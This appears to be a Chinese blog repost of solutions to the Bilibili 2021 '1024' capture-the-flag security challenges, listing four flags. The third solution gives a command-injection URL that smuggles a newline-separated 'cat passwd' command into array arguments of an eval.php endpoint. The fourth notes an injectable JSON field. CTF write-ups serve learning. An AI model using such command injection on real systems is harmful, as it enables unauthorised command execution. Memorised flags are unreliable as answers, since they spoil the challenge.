2021B站1024程序员节 网络攻防

Posted 超人安全院

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了2021B站1024程序员节 网络攻防相关的知识,希望对你有一定的参考价值。

第一题:

加密方式:AES 加密

加密模式:ECB

填充方式:无影响,都可以

Key:hAPPy_1024_2233

96 位密文:e9ca6f21583a1533d3ff4fd47ddc463c6a1c7d2cf084d3640408abca7deabb96a58f50471171b60e02b1a8dbd32db156

输出方式:Hex(十六进制)

解密结果(flag):a1cd5f84-27966146-3776f301-64031bb9

第二题:

F12-Sources-webpack-src-views-home.vue页面的注释里

36c7a7b4-cda04af0-8db0368d-b5166480

第三题:

下载源码审计

接换行符匹配正则表达式,换行执行命令

http://security.bilibili.com/sec1024/q/pro/eval.php?args[]=1%0a&args[]=cat&args[]=passwd

9d3c3014-6c6267e7-086aaee5-1f18452a

第四题:

JSON user_name存在注入点

3d5dd579-0678ef93-18b70cae-cabc5d51

以上是关于2021B站1024程序员节 网络攻防的主要内容,如果未能解决你的问题,请参考以下文章

BiliBili1024程序员节,安全攻防 1

2017-2018-2 20179204《网络攻防实践》缓冲区溢出漏洞实验

网络安全漏洞系列-CSRF漏洞攻防

2017-2018-2 20179204《网络攻防实践》第四周学习总结

2017-2018-2 20179204《网络攻防实践》第五周学习总结

《网络攻防》第九周作业